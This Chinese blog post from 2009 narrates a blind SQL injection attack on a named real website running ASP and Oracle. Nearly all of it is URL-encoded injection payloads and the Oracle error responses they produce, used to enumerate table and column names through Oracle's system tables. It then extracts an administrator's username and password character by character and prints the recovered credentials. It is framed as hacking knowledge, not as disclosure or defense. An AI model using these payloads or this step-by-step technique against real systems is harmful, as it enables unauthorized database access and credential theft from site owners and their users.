注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

85167118的博客

西安艺语网络传媒印务有限公司

 
 
 

日志

 
 

一次对ASP orACLE的注入实战  

2009-12-31 08:20:22|  分类: 黑客知识 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

 http://et.kpworld.com/star.asp?performer=马三立; 

      ------------------------------------------------------ 

      oraOLEDB 错误 

      80040e14 orA-00911: 

      invalid character 

      /star.asp,行83 

      说明过滤了分号。 

      http://et.kpworld.com/star.asp?performer=马三立 

      ---------------------------------------------------- 

      oraOLEDB 错误 

      80004005 orA-01756: 

      括号内的字符串没有正确结束 

      /star.asp,行83 

      看来存在未过滤单引号问题。 

      http://et.kpworld.com/star.asp?performer=马三立 and 1=1 

      ---------------------------------------------------------------- 

      闭和他单引号,正常返回。 

      and 0(select count(*) from admin) and 1=1 

      ----------------------------------------------------------------- 

      oraOLEDB 错误 80040e37 orA-00942: 

      table or view does not exist 

      /star.asp,行83 

      说明不存在ADMIN这个表. 

      ****************************************************************** 

      下面需要知道ORACLE的系统表: 

      确定表中行的总数: 

      select num_rows from user_tables where table_name=表名 

      ----------------------存放当前用户所有表 

      where table_name=表名 

      selectcolumn_name, 

      from user_tab_columns -----------------------存放所有列 

      where table_name=表名 

      and 0(select count(*) from all_tables) and 1=1 

      --------------------------------------------------------------------- 

      存在! 

      all_tables是一个系统表,用来存放当前ID和其他用户的所有表 

      and 0(select count(*) from user_tables) and 1=1 

      --------------------------------------------------------------------- 

      返回。有这个系统表,这个表存放当前用户的所有表 

      and 0(select top 1 table_name from user_tables) and 1=1 

      --------------------------------------------------------------------------------- 

      oraOLEDB 错误 80040e14 orA-00923: 

      FROM keyword not found where expected 

      /star.asp,行83 

      不支持TOP 1 ?。。。。。。这种解释好象不太理想。。。 

      (经过PINKEYES测试已经确定确实不支持TOP 1) 

      and 0(select count(*) from user_tables where table_nam) 

      and 1=1 

      -------------------------------------------------------------------------------------------- 

      oraOLEDB 错误 80040e14 orA-00904: 

      invalid column name /star.asp,行83 

      当语法错误时,会显示无效列名字 

      and 0(select count(*) from user_tables where 

      table_name) and 1=1 

      -------------------------------------------------------------------------------------------- 

      语法正确时,成功返回标志,看来四个单引号表示空.接下来是对一些函数的测试: 

      and 0(select count(*) from user_tables where 

      sum(table_name)>1) and 1=1 

      ------------------------------------------------------------------------------------------------ 

      oraOLEDB 错误 80040e14 orA-00934: 

      group function is not allowed here 

      /star.asp,行83 

      组函数不允许在这里。 

      and 0(select count(*) from user_tables where avg(table_name)) and 

      1=1 

      ------------------------------------------------------------------------------------------- 

      oraOLEDB 错误 80040e14 orA-00934: 

      group function is not allowed here 

      /star.asp,行83 

      组函数不允许在这里。 

      and 0(select to_char(table_name) from user_tables) and%201=1 

      -------------------------------------------------------------------------- 

      oraOLEDB 错误 80004005 orA-01427: 

      single-row subquery returns more 

      than one row 

      /star.asp,行83 

      单行的子查询返回多于一行 

      and 0(select count(*) from user_tables where table_name+1) 

      and%201=1 

      -------------------------------------------------------------------------- 

      oraOLEDB 错误 80040e14 orA-00920: 

      invalid relational operator 

      /star.asp,行83 

      测试到这里,下面看看怎么弄出他的表来: 

      and 0(select count(*) from performer) and%201=1 

      ----------------------------------------------------- 

      成功返回。这里的表是看前面URL猜的. 

      and 0(select count(*) from user_tables where 

      table_name=performer) and%201=1 

      ------------------------------------------------------------------------------------- 

      没返回。失败标志。 

      and%200(select%20count(*)%20from%20user_tables%20where%20table_name=PERFORMER) 

      and%201=1 

      ------------------------------------------------------------------------------------------------ 

      成功了! 看来这个user_tables表只认识大写字母! 

      and 0(select count(*) from user_tables where 

      length(table_name)>10) and%201=1 

      ------------------------------------------------------------------------------------ 

      用length函数确定最长表的位数 

      and 0(select count(*) from user_tables where 

      length(table_name)=18) and%201=1 

      ------------------------------------------------------------------------------------- 

      省略若干步骤,最后确定最长表为18位。 

      and 0(select count(*) from user_tables where 

      substr(table_name,1,1)=A) and%201=1 

      ----------------------------------------------------------------------------------------- 

      第一位为A, 

      and 0(select count(*) from user_tables where 

      substr(table_name,1,2)=AD) and%201=1 

      ----------------------------------------------------------------------------------------- 

      第二位为AD 

      and 0(select count(*) from user_tables where 

      substr(table_name,1,18)=ADMINAUTHORIZATION) and%201=1 

      --------------------------------------------------------------------------------------------- 

      省略若干,18位的表名为ADMINAUTHORIZATION。 

      and 1=(select count(*) from user_tables where 

      table_name=ADMINAUTHORIZATION) and%201=1 

      -------------------------------------------------------------------------------------------- 

      返回。 

      and 0(select count(*) from user_tables where 

      length(table_name)=2) and%201=1 

      ---------------------------------------------------------------------------------- 

      最小表名长度为2 

      and%200(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20%25user%25)%20and%20%201=1 

      ------------------------------------------------------------------------------------------------- 

      没返回。 

      and%200(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20%25ADMIN%25)%20and%201=1 

      ------------------------------------------------------------------------------------------------- 

      and%200(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20%25PER%25) 

      and%201=1 

      ------------------------------------------------------------------------------------------------- 

      and%200(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20%25BBS%25)%20and%201=1 

      ------------------------------------------------------------------------------------------------- 

      都成功返回。看来可以利用LIKE猜。 

      and%200(select%20count(*)%20from%20user_tables%20where%20table_name%20like%25BBS%25%20and%20length(table_name)>8) 

      and%201=1 

      ------------------------------------------------------------------------------------------------- 

      and%200(select%20count(*)%20from%20user_tables%20where%20table_name%20like%25BBS%25%20and%20length(table_name)>10)%20and%201=1 

      ------------------------------------------------------------------------------------------------- 

      and%200(select%20count(*)%20from%20user_tables%20where%20table_name%20like%25BBS%25%20and%20length(table_name)=10)%20and%201=1 

      ------------------------------------------------------------------------------------------------- 

      利用LIKE和LENGTH组合猜,马上就能确定长度。 

      and%200(select%20count(*)%20from%20user_tables%20where%20substr(table_name,1,4)=BBSS)%20and%201=1 

      ------------------------------------------------------------------------------------------------- 

      猜出第四位是S。接下来就是重复劳动了。 

      and%200(select%20count(*)%20from%20user_tables%20where%20substr(table_name,1,10)=BBSSUBJECT)%20and%201=1 

      ------------------------------------------------------------------------------------------------- 

      猜出来了。BBSSUBJECT 

      and%200(select%20count(*)%20from%20user_tab_columns%20where%20table_name=BBSSUBJECT%20and%20column_name%20like%20%25USER%25)%20and%201=1 

      ------------------------------------------------------------------------------------------------- 

      and%200(select%20count(*)%20from%20user_tab_columns%20where%20table_name=BBSSUBJECT%20and%20column_name%20like%20%25USER%25)%20and%201=1 

      ------------------------------------------------------------------------------------------------- 

      没返回,不象是保存用户和密码的表。再来。。。 

      and%200(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20%25USER%25)%20and%201=1 

      ------------------------------------------------------------------------------------------------- 

      and%200(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20%25USER%25%20and%20length(table_name)>10)%20and%201=1 

      ------------------------------------------------------------------------------------------------- 

      and%200(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20%25USER%25%20and%20length(table_name)>15)%20and%201=1 

      ------------------------------------------------------------------------------------------------- 

      and%200(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20%25USER%25%20and%20length(table_name)=15)%20and%201=1 

      ------------------------------------------------------------------------------------------------- 

      确定长度为15。 

      and%200(select%20count(*)%20from%20user_tables%20where%20substr(table_name,1,1)=U%20and%20length(table_name)=15)%20and%201=1 

      ------------------------------------------------------------------------------------------------- 

      and%200(select%20count(*)%20from%20user_tables%20where%20substr(table_name,2,1)=S%20and%20length(table_name)=15)%20and%201=1 

      ------------------------------------------------------------------------------------------------- 

      and%200(select%20count(*)%20from%20user_tables%20where%20substr(table_name,-4,4)=USER%20and%20length(table_name)=15)%20and%201=1 

      ------------------------------------------------------------------------------------------------- 

      and%200(select%20count(*)%20from%20user_tables%20where%20length(table_name)=15%20and%20substr(table_name,-15,15)=UNSUBSCRIBEUSER)%20and%201=1 

      ------------------------------------------------------------------------------------------------- 

      and%200(select%20count(*)%20from%20user_tables%20where%20table_name=UNSUBSCRIBEUSER)%20and%201=1 

      ------------------------------------------------------------------------------------------------- 

      确定表名UNSUBSCRIBEUSER,接下来猜是否有密码字段。。。 

      and%200(select%20count(*)%20from%20user_tab_columns%20where%20table_name=UNSUBSCRIBEUSER%20and%20column_name%20like%20%25USER%25)%20and%201=1 

      ------------------------------------------------------------------------------------------------- 

      and%200(select%20count(*)%20from%20user_tab_columns%20where%20table_name=UNSUBSCRIBEUSER%20and%20column_name%20like%20%25PASS%25)%20and%201=1 

      ------------------------------------------------------------------------------------------------- 

      LIKE PASS,没返回,郁闷,继续。 

      and%200(select%20count(*)%20from%20user_tab_columns%20where%20column_name%20like%20%25PASS%25%20and%20length(table_name)=13)%20and%201=1 

      ------------------------------------------------------------------------------------------------- 

      返回。不准确。 

      ------------------------------------------------------------------------------------------------- 

      and%200(select%20count(*)%20from%20user_tab_columns%20where%20substr(column_name,-2,2)=SS) 

      and%201=1 

      ------------------------------------------------------------------------------------------------- 

      and%200(select%20count(*)%20from%20user_tab_columns%20where%20substr(column_name,6,2)=SS)%20and%201=1 

      ------------------------------------------------------------------------------------------------- 

      and%200(select%20count(*)%20from%20user_tab_columns%20where%20substr(column_name,4,4)=PASS) 

      and%201=1 

      ------------------------------------------------------------------------------------------------- 

      这里用SUBSTR缩小范围. 

      and%200(select%20count(*)%20from%20user_tab_columns%20where%20substr(column_name,4,4)=PASS%20and%20length(column_name)=11)%20and%201=1 

      ------------------------------------------------------------------------------------------------- 

      含有PASS字段的字段长度11位。根据上面的从4位开始数4位是PASS 那么PASS前是3位,后是4位,一共是11位。 

      and%200(select%20count(*)%20from%20user_tab_columns%20where%20substr(column_name,4,8)=PASSWORD)%20and%201=1 

      ------------------------------------------------------------------------------------------------- 

      猜一下,果然是。。。 

      and%200(select%20count(*)%20from%20user_tab_columns%20where%20substr(column_name,-11,11)=STRPASSWORD)%20and%201=1 

      ------------------------------------------------------------------------------------------------- 

      and%200(select%20count(*)%20from%20user_tab_columns%20where%20column_name=STRPASSWORD)%20and%201=1 

      ------------------------------------------------------------------------------------------------- 

      and%200(select%20count(*)%20from%20user_tab_columns%20where%20column_name=STRPASSWORD%20and%20length(table_name)=13) 

      ------------------------------------------------------------------------------------------------- 

      and%200(select%20count(*)%20from%20user_tab_columns%20where%20column_name=STRPASSWORD%20and%20length(table_name)=13)%20and%201=1 

      ------------------------------------------------------------------------------------------------- 

      全返回,确定密码字段名字STRPASSWORD。把密码字段抓到就好办了,再利用他抓表名: 

      and%200(select%20count(*)%20from%20user_tab_columns%20where%20column_name=STRPASSWORD%20and%20length(table_name)=13) 

      and 1=1 

      ------------------------------------------------------------------------------------------------- 

      返回,和上面猜出的表名长度符合。用SUBSTR猜出他名字: 

      and%200(select%20count(*)%20from%20user_tab_columns%20where%20column_name=STRPASSWORD%20and%20substr(table_name,1,13)=ADMINISTRATOR) 

      and 1=1 

      ------------------------------------------------------------------------------------------------- 

      and%200(select%20count(*)%20from%20user_tab_columns%20where%20column_name=STRPASSWORD%20and%20table_name=ADMINISTRATOR) 

      and 1=1 

      ------------------------------------------------------------------------------------------------- 

      and%200(select%20count(*)%20from%20user_tables%20where%20table_name=ADMINISTRATOR) 

      and 1=1 

      ------------------------------------------------------------------------------------------------- 

      全返回,确定表名为:ADMINISTRATOR. 

      and%208=(select%20count(*)%20from%20user_tab_columns%20where%20table_name=ADMINISTRATOR) 

      and 1=1 

      ------------------------------------------------------------------------------------------------- 

      猜出表里有8个字段。 

      and%200(select%20count(*)%20from%20user_tab_columns%20where%20table_name=ADMINISTRATOR%20and%20column_name%20like%20%25ID%25)%20and%201=1 

      ------------------------------------------------------------------------------------------------- 

      and%203=(select%20count(*)%20from%20ADMINISTRATOR) and 1=1 

      ------------------------------------------------------------------------------------------------- 

      and%200(select%20count(*)%20from%20user_tab_columns%20where%20table_name=ADMINISTRATOR%20and%20substr(column_name,4,2)=ID)%20and%201=1 

      ------------------------------------------------------------------------------------------------- 

      and%200(select%20count(*)%20from%20user_tab_columns%20where%20table_name=ADMINISTRATOR%20and%20substr(column_name,-2,2)=ID)%20and%201=1 

      ------------------------------------------------------------------------------------------------- 

      可以判断是ID结尾了,长度为5。 

      and%200(select%20count(*)%20from%20user_tab_columns%20where%20table_name=ADMINISTRATOR%20and%20substr(column_name,-5,5)=LNGID)%20and%201=1 

      ------------------------------------------------------------------------------------------------- 

      and%200(select%20count(*)%20from%20user_tab_columns%20where%20table_name=ADMINISTRATOR%20and%20column_name=LNGID)%20and%201=1 

      ------------------------------------------------------------------------------------------------- 

      出来了,LNGID。 

      and%200(select%20count(*)%20from%20ADMINISTRATOR%20where%20length(LNGID)=2)%20and%201=1 

      ------------------------------------------------------------------------------------------------- 

      and%208=(select%20min(LNGID)%20from%20ADMINISTRATOR)%20and%201=1 

      ------------------------------------------------------------------------------------------------- 

      and%2021=(select%20max(LNGID)%20from%20ADMINISTRATOR)%20and%201=1 

      ------------------------------------------------------------------------------------------------- 

      最小ID,最大ID也出来,接下来弄密码: 

      and%200(select%20count(*)%20from%20ADMINISTRATOR%20where%20length(STRPASSWORD)=4%20and%20LNGID=8)%20and%201=1 

      ------------------------------------------------------------------------------------------------- 

      LNGID为8的密码长度为4 

      and%200(select%20count(*)%20from%20ADMINISTRATOR%20where%20ascii(substr(STRPASSWORD,1,1))=116%20and%20LNGID=8)%20and%201=1 

      ------------------------------------------------------------------------------------------------- 

      第一位 

      and%200(select%20count(*)%20from%20ADMINISTRATOR%20where%20ascii(substr(STRPASSWORD,2,1))=101%20and%20LNGID=8)%20and%201=1 

      ------------------------------------------------------------------------------------------------- 

      第二位 

      and%200(select%20count(*)%20from%20ADMINISTRATOR%20where%20ascii(substr(STRPASSWORD,3,1))=115%20and%20LNGID=8)%20and%201=1 

      ------------------------------------------------------------------------------------------------- 

      第三位 

      and%200(select%20count(*)%20from%20ADMINISTRATOR%20where%20ascii(substr(STRPASSWORD,4,1))=116%20and%20LNGID=8)%20and%201=1 

      ------------------------------------------------------------------------------------------------- 

      第四位 

      STRPASSWORD:test 

      and%200(select%20count(*)%20from%20ADMINISTRATOR%20where%20STRPASSWORD=test%20and%20LNGID=8)%20and%201=1 

      ------------------------------------------------------------------------------------------------- 

      OH,YEAH~~密码出来了。 

      接着搞用户名: 

      and%200(select%20count(*)%20from%20user_tab_columns%20where%20table_name=ADMINISTRATOR%20and%20column_name%20like%20%25NAME%25)%20and%201=1 

      ------------------------------------------------------------------------------------------------- 

      and%200(select%20count(*)%20from%20user_tab_columns%20where%20table_name=ADMINISTRATOR%20and%20substr(column_name,4,4)=NAME)%20and%201=1 

      ------------------------------------------------------------------------------------------------- 

      and%200(select%20count(*)%20from%20user_tab_columns%20where%20table_name=ADMINISTRATOR%20and%20substr(column_name,-4,4)=NAME)%20and%201=1 

      ------------------------------------------------------------------------------------------------- 

      and%200(select%20count(*)%20from%20user_tab_columns%20where%20table_name=ADMINISTRATOR%20and%20substr(column_name,1,7)=STRNAME)%20and%201=1 

      ------------------------------------------------------------------------------------------------- 

      出来了,字段:STRNAME 

      and%200(select%20count(*)%20from%20user_tab_columns%20where%20table_name=ADMINISTRATOR%20and%20column_name%20not%20in(STRNAME,STRPASSWORD,LNGID))%20and%201=1 

      ------------------------------------------------------------------------------------------------- 

      and%200(select%20count(*)%20from%20ADMINISTRATOR%20where%20STRPASSWORD=test%20and%20LNGID=8%20and%20length(STRNAME)=4)%20and%201=1 

      ------------------------------------------------------------------------------------------------- 

      STRNAME值长度为4,不会是和密码相同吧。。。 

      and%200(select%20count(*)%20from%20ADMINISTRATOR%20where%20STRPASSWORD=test%20and%20LNGID=8%20and%20STRNAME=test)%20and%201=1 

      ------------------------------------------------------------------------------------------------- 

      呵呵,果然。 

      表名ADMINISTRATOR,列名:STRNAME,STRPASSWORD,LNGID 

      LNGID=8 STRNAME=test STRPASSWORD=test 

      测试完成!剩下的只是时间问题了。 

 

 

  评论这张
 
阅读(74)| 评论(0)
推荐 转载

历史上的今天

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017